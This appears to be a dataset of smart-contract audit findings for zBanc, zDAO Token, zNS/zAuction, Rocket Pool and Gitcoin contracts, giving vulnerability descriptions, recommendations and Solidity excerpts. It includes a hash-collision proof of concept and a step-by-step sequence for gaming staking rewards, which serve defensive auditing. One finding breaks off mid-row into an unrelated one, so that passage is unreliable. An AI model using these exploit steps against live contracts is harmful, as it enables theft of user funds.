ownership might be transferred before updating values). To unbreak this behavior a new authentication modifier was added, that allows updates for the upgrade contradict while the contract is active. Now this is a behavior that should be avoided as settings should be predictable while a contract is active. Instead it would make more sense initially set all the custom settings of the converter to zero (uninitialized) and require them to be set and only the return the contract as active. The behavior basically mirrors the upgrade process of `LiquidityPoolV2Converter`.\\n```\\n modifier ifActiveOnlyUpgrader(){\\n if(isActive()){\\n require(owner == addressOf(CONVERTER\\_UPGRADER), ""ERR\\_ACTIVE\\_NOTUPGRADER"");\\n }\\n \\_;\\n }\\n```\\n\\nPre initialized variables should be avoided. The marketcap threshold can only be set by the calling entity as it may be very different depending on the type of reserve (eth, token).\\n```\\nuint32 public minimumWeight = 30000;\\nuint32 public stepWeight = 10000;\\nuint256 public marketCapThreshold = 10000 ether;\\nuint256 public lastWeightAdjustmentMarketCap = 0;\\n```\\n\\nHere's one of the setter functions that can be called while the contract is active (only by the upgrader contract but changing the ACL commonly followed with other converters).\\n```\\nfunction setMarketCapThreshold(uint256 \\_marketCapThreshold)\\n public\\n ownerOnly\\n ifActiveOnlyUpgrader\\n{\\n marketCapThreshold = \\_marketCapThreshold;\\n emit MarketCapThresholdUpdated(\\_marketCapThreshold);\\n}\\n```\\n","Align the upgrade process as much as possible to how `LiquidityPoolV2Converter` performs it. Comply with the bancor API.\\noverride `isActive` and require the contracts main variables to be set.\\ndo not pre initialize the contracts settings to “some” values. Require them to be set by the caller (and perform input validation)\\nmirror the upgrade process of `LiquidityPoolV2Converter` and instead of `activate` call the setter functions that set the variables. After setting the last var and anchor ownership been transferred, the contract should return active.",,"```\\n/\\*\\*\\n \\* @dev returns true if the converter is active, false otherwise\\n \\*\\n \\* @return true if the converter is active, false otherwise\\n\\*/\\nfunction isActive() public view virtual override returns (bool) {\\n return anchor.owner() == address(this);\\n}\\n```\\n" +"zBanc - inconsistent DynamicContractRegistry, admin risks",medium,"`DynamicContractRegistry` is a wrapper registry that allows the zBanc to use the custom upgrader contract while still providing access to the normal bancor registry.\\nFor this to work, the registry owner can add or override any registry setting. Settings that don't exist in this contract are attempted to be retrieved from an underlying registry (contractRegistry).\\n```\\nfunction registerAddress(bytes32 \\_contractName, address \\_contractAddress)\\n public\\n ownerOnly\\n validAddress(\\_contractAddress)\\n{\\n```\\n\\nIf the item does not exist in the registry, the request is forwarded to the underlying registry.\\n```\\nfunction addressOf(bytes32 \\_contractName) public view override returns (address) {\\n if(items[\\_contractName].contractAddress != address(0)){\\n return items[\\_contractName].contractAddress;\\n }else{\\n return contractRegistry.addressOf(\\_contractName);\\n }\\n}\\n```\\n\\nAccording to the documentation this registry is owned by zer0 admins and this means users have to trust zer0 admins to play fair.\\nTo handle this, we deploy our own ConverterUpgrader and ContractRegistry owned by zer0 admins who can register new addresses\\nThe owner of the registry (zer0 admins) can change the underlying registry contract at will. The owner can also add new or override any settings that already exist in the underlying registry. This may for example allow a malicious owner to change the upgrader contract in an attempt to potentially steal funds from a token converter or upgrade to a new malicious contract. The owner can also front-run registry calls changing registry settings and thus influencing the outcome. Such an event will not go unnoticed as events are emitted.\\nIt should also be noted that `itemCount` will return only the number of items in the wrapper registry but not the number of items in the underlying registry. This may have an unpredictable effect on components consuming this information.\\n```\\n/\\*\\*\\n \\* @dev returns the number of items in the registry\\n \\*\\n \\* @return number of items\\n\\*/\\nfunction itemCount() public view returns (uint256) {\\n return contractNames.length;\\n}\\n```\\n","Resolution\\nThe client acknowledged the admin risk and addressed the `itemCount` concerns by exposing another method that only returns the overridden entries. The following statement was provided:\\n5.10 - keeping this pattern which matches the bancor pattern, and noting the DCR should be owned by a DAO, which is our plan. solved itemCount issue - Added dcrItemCount and made itemCount call the bancor registry's itemCount, so unpredictable behavior due to the count should be eliminated.\\nRequire the owner/zer0 admins to be a DAO or multisig and enforce 2-step (notify->wait->upgrade) registry updates (e.g. by requiring voting or timelocks in the admin contract). Provide transparency about who is the owner of the registry as this may not be clear for everyone. Evaluate the impact of `itemCount` only returning the number of settings in the wrapper not taking into account entries in the subcontract (including pot. overlaps).",,"```\\nfunction registerAddress(bytes32 \\_contractName, address \\_contractAddress)\\n public\\n ownerOnly\\n validAddress(\\_contractAddress)\\n{\\n```\\n" +zBanc - DynamicLiquidTokenConverter consider using PPM_RESOLUTION instead of hardcoding integer literals,low,`getMarketCap` calculates the reserve's market capitalization as `reserveBalance * `1e6` / weight` where `1e6` should be expressed as the constant `PPM_RESOLUTION`.\\n```\\nfunction getMarketCap(IERC20Token \\_reserveToken)\\n public\\n view\\n returns(uint256)\\n{\\n Reserve storage reserve = reserves[\\_reserveToken];\\n return reserveBalance(\\_reserveToken).mul(1e6).div(reserve.weight);\\n}\\n```\\n,Avoid hardcoding integer literals directly into source code when there is a better expression available. In this case `1e6` is used because weights are denoted in percent to base `PPM_RESOLUTION` (=100%).,,```\\nfunction getMarketCap(IERC20Token \\_reserveToken)\\n public\\n view\\n returns(uint256)\\n{\\n Reserve storage reserve = reserves[\\_reserveToken];\\n return reserveBalance(\\_reserveToken).mul(1e6).div(reserve.weight);\\n}\\n```\\n +zBanc - DynamicLiquidTokenConverter avoid potential converter type overlap with bancor Acknowledged,low,"The system is forked frombancorprotocol/contracts-solidity. As such, it is very likely that security vulnerabilities reported to bancorprotocol upstream need to be merged into the zer0/zBanc fork if they also affect this codebase. There is also a chance that security fixes will only be available with feature releases or that the zer0 development team wants to merge upstream features into the zBanc codebase.\\nzBanc introduced `converterType=3` for the `DynamicLiquidTokenConverter` as `converterType=1` and `converterType=2` already exist in the bancorprotocol codebase. Now, since it is unclear if `DynamicLiquidTokenConverter` will be merged into bancorprotocol there is a chance that bancor introduces new types that overlap with the `DynamicLiquidTokenConverter` converter type (3). It is therefore suggested to map the `DynamicLiquidTokenConverter` to a converterType that is unlikely to create an overlap with the system it was forked from. E.g. use converter type id `1001` instead of `3` (Note: converterType is an uint16).\\nNote that the current master of the bancorprotocol already appears to defined converterType 3 and 4: https://github.com/bancorprotocol/contracts-solidity/blob/5f4c53ebda784751c3a90b06aa2c85e9fdb36295/solidity/test/helpers/Converter.js#L51-L54\\nThe new custom converter\\n```\\nfunction converterType() public pure override returns (uint16) {\\n return 3;\\n}\\n```\\n\\nConverterTypes from the bancor base system\\n```\\nfunction converterType() public pure override returns (uint16) {\\n return 1;\\n}\\n```\\n\\n```\\n\\*/\\nfunction converterType() public pure override returns (uint16) {\\n return 2;\\n}\\n```\\n",Choose a converterType id for this custom implementation that does not overlap with the codebase the system was forked from. e.g. `uint16(-1)` or `1001` instead of `3` which might already be used upstream.,,```\\nfunction converterType() public pure override returns (uint16) {\\n return 3;\\n}\\n```\\n +zDAO Token - Specification violation - Snapshots are never taken Partially Addressed,high,"Resolution\\nAddressed with zer0-os/[email protected]81946d4 by exposing the `_snapshot()` method to a dedicated snapshot role (likely to be a DAO) and the owner of the contract.\\nWe would like to note that we informed the client that depending on how the snapshot method is used and how predictably snapshots are consumed this might open up a frontrunning vector where someone observing that a `_snapshot()` is about to be taken might sandwich the snapshot call, accumulate a lot of stake (via 2nd markets, lending platforms), and returning it right after it's been taken. The risk of losing funds may be rather low (especially if performed by a miner) and the benefit from a DAO proposal using this snapshot might outweigh it. It is still recommended to increase the number of snapshots taken or take them on a regular basis (e.g. with every first transaction to the contract in a block) to make it harder to sandwich the snapshot taking.\\nAccording to the zDAO Token specification the DAO token should implement a snapshot functionality to allow it being used for DAO governance votings.\\nAny transfer, mint, or burn operation should result in a snapshot of the token balances of involved users being taken.\\nWhile the corresponding functionality is implemented and appears to update balances for snapshots, `_snapshot()` is never called, therefore, the snapshot is never taken. e.g. attempting to call `balanceOfAt` always results in an error as no snapshot is available.\\n```\\ncontract ZeroDAOToken is\\n OwnableUpgradeable,\\n ERC20Upgradeable,\\n ERC20PausableUpgradeable,\\n ERC20SnapshotUpgradeable\\n{\\n```\\n\\n```\\n\\_updateAccountSnapshot(sender);\\n```\\n\\nNote that this is an explicit requirement as per specification but unit tests do not seem to attempt calls to `balanceOfAt` at all.","Actually, take a snapshot by calling `_snapshot()` once per block when executing the first transaction in a new block. Follow the openzeppeling documentation for ERC20Snapshot.",,"```\\ncontract ZeroDAOToken is\\n OwnableUpgradeable,\\n ERC20Upgradeable,\\n ERC20PausableUpgradeable,\\n ERC20SnapshotUpgradeable\\n{\\n```\\n" +zDAO-Token - Revoking vesting tokens right before cliff period expiration might be delayed/front-runned,low,"The owner of `TokenVesting` contract has the right to revoke the vesting of tokens for any `beneficiary`. By doing so, the amount of tokens that are already vested and weren't released yet are being transferred to the `beneficiary`, and the rest are being transferred to the owner. The `beneficiary` is expected to receive zero tokens in case the revocation transaction was executed before the cliff period is over. Although unlikely, the `beneficiary` may front run this revocation transaction by delaying the revocation (and) or inserting a release transaction right before that, thus withdrawing the vested amount.\\n```\\nfunction release(address beneficiary) public {\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n require(unreleased > 0, ""Nothing to release"");\\n\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n award.released += unreleased;\\n\\n targetToken.safeTransfer(beneficiary, unreleased);\\n\\n emit Released(beneficiary, unreleased);\\n}\\n\\n/\\*\\*\\n \\* @notice Allows the owner to revoke the vesting. Tokens already vested\\n \\* are transfered to the beneficiary, the rest are returned to the owner.\\n \\* @param beneficiary Who the tokens are being released to\\n \\*/\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, ""Cannot be revoked"");\\n require(!award.revoked, ""Already revoked"");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\n","The issue described above is possible, but very unlikely. However, the `TokenVesting` owner should be aware of that, and make sure not to revoke vested tokens closely to cliff period ending.",,"```\\nfunction release(address beneficiary) public {\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n require(unreleased > 0, ""Nothing to release"");\\n\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n award.released += unreleased;\\n\\n targetToken.safeTransfer(beneficiary, unreleased);\\n\\n emit Released(beneficiary, unreleased);\\n}\\n\\n/\\*\\*\\n \\* @notice Allows the owner to revoke the vesting. Tokens already vested\\n \\* are transfered to the beneficiary, the rest are returned to the owner.\\n \\* @param beneficiary Who the tokens are being released to\\n \\*/\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, ""Cannot be revoked"");\\n require(!award.revoked, ""Already revoked"");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\n" +zDAO-Token - Vested tokens revocation depends on claiming state,low,"The owner of the `TokenVesting` contract can revoke the vesting of tokens for any beneficiary by calling `TokenVesting.revoke` only for tokens that have already been claimed using `MerkleTokenVesting.claimAward`. Although anyone can call `MerkleTokenVesting.claimAward` for a given beneficiary, in practice it is mostly the beneficiary's responsibility. This design decision, however, incentivizes the beneficiary to delay the call to `MerkleTokenVesting.claimAward` up to the point when he wishes to cash out, to avoid potential revocation. To revoke vesting tokens the owner will have to claim the award on the beneficiary's behalf first (which might be a gas burden), then call `TokenVesting.revoke`.\\n```\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, ""Cannot be revoked"");\\n require(!award.revoked, ""Already revoked"");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\n","Make sure that the potential owner of a `TokenVesting` contract is aware of this potential issue, and has the required processes in place to handle it.",,"```\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, ""Cannot be revoked"");\\n require(!award.revoked, ""Already revoked"");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\n" +zNS - Domain bid might be approved by non owner account,high,"The spec allows anyone to place a bid for a domain, while only parent domain owners are allowed to approve a bid. Bid placement is actually enforced and purely informational. In practice, `approveDomainBid` allows any parent domain owner to approve bids (signatures) for any other domain even if they do not own it. Once approved, anyone can call `fulfillDomainBid` to create a domain.\\n```\\nfunction approveDomainBid(\\n uint256 parentId,\\n string memory bidIPFSHash,\\n bytes memory signature\\n) external authorizedOwner(parentId) {\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n approvedBids[hashOfSig] = true;\\n emit DomainBidApproved(bidIPFSHash);\\n}\\n```\\n",Resolution\\nAddressed with zer0-os/[email protected] by storing the domain request data on-chain.\\nConsider adding a validation check that allows only the parent domain owner to approve bids on one of its domains. Reconsider the design of the system introducing more on-chain guarantees for bids.,,"```\\nfunction approveDomainBid(\\n uint256 parentId,\\n string memory bidIPFSHash,\\n bytes memory signature\\n) external authorizedOwner(parentId) {\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n approvedBids[hashOfSig] = true;\\n emit DomainBidApproved(bidIPFSHash);\\n}\\n```\\n" +"zAuction, zNS - Bids cannot be cancelled, never expire, and the auction lifecycle is unclear",high,"The lifecycle of a bid both for `zAuction` and `zNS` is not clear, and has many flaws.\\n`zAuction` - Consider the case where a bid is placed, then the underlying asset in being transferred to a new owner. The new owner can now force to sell the asset even though it's might not be relevant anymore.\\n`zAuction` - Once a bid was accepted and the asset was transferred, all other bids need to be invalidated automatically, otherwise and old bid might be accepted even after the formal auction is over.\\n`zAuction`, `zNS` - There is no way for the bidder to cancel an old bid. That might be useful in the event of a significant change in market trend, where the old pricing is no longer relevant. Currently, in order to cancel a bid, the bidder can either withdraw his ether balance from the `zAuctionAccountant`, or disapprove `WETH` which requires an extra transaction that might be front-runned by the seller.\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n\\n```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, ""ZNS: bid info doesnt match/exist"");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, ""ZNS: has been fullfilled"");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\n","Consider adding an expiration field to the message signed by the bidder both for `zAuction` and `zNS`. Consider adding auction control, creating an `auctionId`, and have users bid on specific auctions. By adding this id to the signed message, all other bids are invalidated automatically and users would have to place new bids for a new auction. Optionally allow users to cancel bids explicitly.\\n",,"```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n" +zNS - Insufficient protection against replay attacks,high,"There is no dedicated data structure to prevent replay attacks on `StakingController`. `approvedBids` mapping offers only partial mitigation, due to the fact that after a domain bid is fulfilled, the only mechanism in place to prevent a replay attack is the `Registrar` contract that might be replaced in the case where `StakingController` is being re-deployed with a different `Registrar` instance. Additionally, the digital signature used for domain bids does not identify the buyer request uniquely enough. The bidder's signature could be replayed in future similar contracts that are deployed with a different registrar or in a different network.\\n```\\nfunction createBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n string memory bidIPFSHash,\\n string memory name\\n) public pure returns(bytes32) {\\n return keccak256(abi.encode(parentId, bidAmount, bidIPFSHash, name));\\n}\\n```\\n","Consider adding a dedicated mapping to store the a unique identifier of a bid, as well as adding `address(this)`, `block.chainId`, `registrar` and `nonce` to the message that is being signed by the bidder.",,"```\\nfunction createBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n string memory bidIPFSHash,\\n string memory name\\n) public pure returns(bytes32) {\\n return keccak256(abi.encode(parentId, bidAmount, bidIPFSHash, name));\\n}\\n```\\n" +zNS - domain name collisions,high,"Domain registration accepts an empty (zero-length) name. This may allow a malicious entity to register two different NFT's for the same visually indinstinguishable text representation of a domain. Similar to this the domain name is mapped to an NFT via a subgraph that connects parent names to the new subdomain using a domain separation character (dot/slash/…). Someone might be able to register `a.b` to `cats.cool` which might resolve to the same domain as if someone registers `cats.cool.a` and then `cats.cool.a.b`.\\n`0/cats/` = `0xfe`\\n`0/cats/ refund NETH]\\n[burn NETH for ETH]\\n// rest of code wait 14 days\\n[withdraw stake OR start again creating Minipools, claiming rewards while the Minipools are dissolved right after, freeing the ETH]\\n```\\n\\nBy staking just before claiming, the node effectively can earn rewards for 2 reward periods by only staking RPL for the duration of one period (claim the previous period, leave it in for 14 days, claim another period, withdraw).\\nThe stake can be withdrawn at the earliest 14 days after staking. However, it can be added back at any time, and the stake addition takes effect immediately. This allows for optimizing the staking reward as follows (assuming we front-run other claimers to maximize profits and perform all transactions in one block):\\n```\\n[stake max effective amount for the number of minipools]\\n[claim() to claim the previous period even though we did not provide any stake for the duration]\\n[optionally dissolve Minipools unlocking ETH]\\n-- stake is locked for at least 14 days --\\n-- 14 days forward - new reward period started --\\n[claim() the period]\\n[withdraw() (leaving min pool stake OR everything if we dissolve all the Minipool)]\\n[lend RPL to other platforms and earn interest]\\n-- 14 days forward -new reward period started --\\n[get RPL back from another platform]\\n[stake & create minipools to inflate effective stake]\\n[claim()]\\n[optionally dissolve Minipools to unlock node ETH]\\n-- stake is locked for at least 14 days --\\n-- 14 days forward - new reward period started --\\n[claim() the period]\\n[withdraw() (leaving min pool stake OR everything if we dissolve all the Minipools)]\\n[lend RPL to other platforms and earn interest]\\n// rest of code\\n```\\n\\nNote that `withdraw()` can be called right at the time the new reward period starts:\\n```\\nrequire(block.number.sub(getNodeRPLStakedBlock(msg.sender)) >= rocketDAOProtocolSettingsRewards.getRewardsClaimIntervalBlocks(), ""The withdrawal cooldown period has not passed"");\\n// Get & check node's current RPL stake\\n```\\n\\nA node may choose to register and stake some RPL to collect rewards but never actually provide registered node duties, e.g., operating a Minipool.\\nNode shares for a passed reward epoch are unpredictable as nodes may change their stake (adding) after/before users claim their rewards.\\nA node can maximize its rewards by adding stake just before claiming it\\nA node can stake to claim rewards, wait 14 days, withdraw, lend on a platform and return the stake in time to claim the next period.",Review the incentive model for the RPL rewards. Consider adjusting it so that nodes that provide a service get a better share of the rewards. Consider accruing rewards for the duration the stake was provided instead of taking a snapshot whenever the node calls `claim()`. Require stake to be locked for > 14 days instead of >=14 days (withdraw()) or have users skip the first reward period after staking.,,"```\\n-- reward period ends -- front-run other claimers to maximize profits\\n[create x minipools]\\n[stake to max effective RPL for amount of minipools; locked for 14 days]\\n[claim rewards for inflated effective RPL stake]\\n[dissolve(), close() minipools -> refund NETH]\\n[burn NETH for ETH]\\n// rest of code wait 14 days\\n[withdraw stake OR start again creating Minipools, claiming rewards while the Minipools are dissolved right after, freeing the ETH]\\n```\\n" +Prefer using abi.encode in TokenDistributor,medium,"The method `_hashLeaf` is called when a user claims their airdrop.\\n```\\n// can we repoduce leaf hash included in the claim?\\nrequire(\\_hashLeaf(user\\_id, user\\_amount, leaf), 'TokenDistributor: Leaf Hash Mismatch.');\\n```\\n\\nThis method receives the `user_id` and the `user_amount` as arguments.\\n```\\n/\\*\\*\\n\\* @notice hash user\\_id + claim amount together & compare results to leaf hash \\n\\* @return boolean true on match\\n\\*/\\nfunction \\_hashLeaf(uint32 user\\_id, uint256 user\\_amount, bytes32 leaf) private returns (bool) {\\n```\\n\\nThese arguments are abi encoded and hashed together to produce a unique hash.\\n```\\nbytes32 leaf\\_hash = keccak256(abi.encodePacked(keccak256(abi.encodePacked(user\\_id, user\\_amount))));\\n```\\n\\nThis hash is checked against the third argument for equality.\\n```\\nreturn leaf == leaf\\_hash;\\n```\\n\\nIf the hash matches the third argument, it returns true and considers the provided `user_id` and `user_amount` are correct.\\nHowever, packing differently sized arguments may produce collisions.\\nThe Solidity documentation states that packing dynamic types will produce collisions, but this is also the case if packing `uint32` and `uint256`.\\nBelow there's an example showing that packing `uint32` and `uint256` in both orders can produce collisions with carefully picked values.\\n```\\nlibrary Encode {\\n function encode32Plus256(uint32 \\_a, uint256 \\_b) public pure returns (bytes memory) {\\n return abi.encodePacked(\\_a, \\_b);\\n }\\n \\n function encode256Plus32(uint256 \\_a, uint32 \\_b) public pure returns (bytes memory) {\\n return abi.encodePacked(\\_a, \\_b);\\n }\\n}\\n\\ncontract Hash {\\n function checkEqual() public pure returns (bytes32, bytes32) {\\n // Pack 1\\n uint32 a1 = 0x12345678;\\n uint256 b1 = 0x99999999999999999999999999999999999999999999999999999999FFFFFFFF;\\n \\n // Pack 2\\n uint256 a2 = 0x1234567899999999999999999999999999999999999999999999999999999999;\\n uint32 b2 = 0xFFFFFFFF;\\n \\n // Encode these 2 different values\\n bytes memory packed1 = Encode.encode32Plus256(a1, b1);\\n bytes memory packed2 = Encode.encode256Plus32(a2, b2);\\n \\n // Check if the packed encodings match\\n require(keccak256(packed1) == keccak256(packed2), ""Hash of representation should match"");\\n \\n // The hashes are the same\\n // 0x9e46e582607c5c6e05587dacf66d311c4ced0819378a41d4b4c5adf99d72408e\\n return (\\n keccak256(packed1),\\n keccak256(packed2)\\n );\\n }\\n}\\n```\\n\\nChanging `abi.encodePacked` to `abi.encode` in the library will make the transaction fail with error message `Hash of representation should match`.","Resolution\\nFixed in gitcoinco/governance#7\\nUnless there's a specific use case to use `abi.encodePacked`, you should always use `abi.encode`. You might need a few more bytes in the transaction data, but it prevents collisions. Similar fix can be achieved by using `unit256` for both values to be packed to prevent any possible collisions.",,"```\\n// can we repoduce leaf hash included in the claim?\\nrequire(\\_hashLeaf(user\\_id, user\\_amount, leaf), 'TokenDistributor: Leaf Hash Mismatch.');\\n```\\n" +Simplify claim tokens for a gas discount and less code,low,"The method `claimTokens` in `TokenDistributor` needs to do a few checks before it can distribute the tokens.\\nA few of these checks can be simplified and optimized.\\nThe method `hashMatch` can be removed because it's only used once and the contents can be moved directly into the parent method.\\n```\\n// can we reproduce the same hash from the raw claim metadata?\\nrequire(hashMatch(user\\_id, user\\_address, user\\_amount, delegate\\_address, leaf, eth\\_signed\\_message\\_hash\\_hex), 'TokenDistributor: Hash Mismatch.');\\n```\\n\\nBecause this method also uses a few other internal calls, they also need to be moved into the parent method.\\n```\\nreturn getDigest(claim) == eth\\_signed\\_message\\_hash\\_hex;\\n```\\n\\n```\\nhashClaim(claim)\\n```\\n\\nMoving the code directly in the parent method and removing them will improve gas costs for users.\\nThe structure `Claim` can also be removed because it's not used anywhere else in the code.",Consider simplifying `claimTokens` and remove unused methods.,,"```\\n// can we reproduce the same hash from the raw claim metadata?\\nrequire(hashMatch(user\\_id, user\\_address, user\\_amount, delegate\\_address, leaf, eth\\_signed\\_message\\_hash\\_hex), 'TokenDistributor: Hash Mismatch.');\\n```\\n" +Rename method _hashLeaf to something that represents the validity of the leaf,low,"The method `_hashLeaf` accepts 3 arguments.\\n```\\nfunction \\_hashLeaf(uint32 user\\_id, uint256 user\\_amount, bytes32 leaf) private returns (bool) {\\n```\\n\\nThe arguments `user_id` and `user_amount` are used to create a keccak256 hash.\\n```\\nbytes32 leaf\\_hash = keccak256(abi.encodePacked(keccak256(abi.encodePacked(user\\_id, user\\_amount))));\\n```\\n\\nThis hash is then checked if it matches the third argument.\\n```\\nreturn leaf == leaf\\_hash;\\n```\\n\\nThe result of the equality is returned by the method.\\nThe name of the method is confusing because it should say that it returns true if the leaf is considered valid.",Resolution\\nClosed because the method was removed in gitcoinco/governance#4\\nConsider renaming the method to something like `isValidLeafHash`.,,"```\\nfunction \\_hashLeaf(uint32 user\\_id, uint256 user\\_amount, bytes32 leaf) private returns (bool) {\\n```\\n" +Method returns bool but result is never used in TokenDistributor.claimTokens,low,"The method `_delegateTokens` is called when a user claims their tokens to automatically delegate the claimed tokens to their own address or to a different one.\\n```\\n\\_delegateTokens(user\\_address, delegate\\_address);\\n```\\n\\nThe method accepts the addresses of the delegator and the delegate and returns a boolean.\\n```\\n/\\*\\*\\n\\* @notice execute call on token contract to delegate tokens \\n\\* @return boolean true on success \\n\\*/\\nfunction \\_delegateTokens(address delegator, address delegatee) private returns (bool) {\\n GTCErc20 GTCToken = GTCErc20(token);\\n GTCToken.delegateOnDist(delegator, delegatee);\\n return true; \\n} \\n```\\n\\nBut this boolean is never used.",Remove the returned boolean because it's always returned as `true` anyway and the transaction will be a bit cheaper.,,"```\\n\\_delegateTokens(user\\_address, delegate\\_address);\\n```\\n" +Improve efficiency by using immutable in TreasuryVester,low,The `TreasuryVester` contract when deployed has a few fixed storage variables.\\n```\\ngtc = gtc\\_;\\n```\\n\\n```\\nvestingAmount = vestingAmount\\_;\\nvestingBegin = vestingBegin\\_;\\nvestingCliff = vestingCliff\\_;\\nvestingEnd = vestingEnd\\_;\\n```\\n\\nThese storage variables are defined in the contract.\\n```\\naddress public gtc;\\n```\\n\\n```\\nuint public vestingAmount;\\nuint public vestingBegin;\\nuint public vestingCliff;\\nuint public vestingEnd;\\n```\\n\\nBut they are never changed.,Resolution\\nFixed in gitcoinco/governance#5\\nConsider setting storage variables as `immutable` type for a considerable gas improvement.,,```\\ngtc = gtc\\_;\\n```\\n +RocketDaoNodeTrusted - DAO takeover during deployment/bootstrapping,high,"The initial deployer of the `RocketStorage` contract is set as the Guardian/Bootstrapping role. This guardian can bootstrap the TrustedNode and Protocol DAO, add members, upgrade components, change settings.\\nRight after deploying the DAO contract the member count is zero. The Guardian can now begin calling any of the bootstrapping functions to add members, change settings, upgrade components, interact with the treasury, etc. The bootstrapping configuration by the Guardian is unlikely to all happen within one transaction which might allow other parties to interact with the system while it is being set up.\\n`RocketDaoNodeTrusted` also implements a recovery mode that allows any registered node to invite themselves directly into the DAO without requiring approval from the Guardian or potential other DAO members as long as the total member count is below `daoMemberMinCount` (3). The Guardian itself is not counted as a DAO member as it is a supervisory role.\\n```\\n/\\*\\*\\*\\* Recovery \\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*/\\n \\n// In an explicable black swan scenario where the DAO loses more than the min membership required (3), this method can be used by a regular node operator to join the DAO\\n// Must have their ID, email, current RPL bond amount available and must be called by their current registered node account\\nfunction memberJoinRequired(string memory \\_id, string memory \\_email) override public onlyLowMemberMode onlyRegisteredNode(msg.sender) onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets add them\\n (bool successPropose, bytes memory responsePropose) = 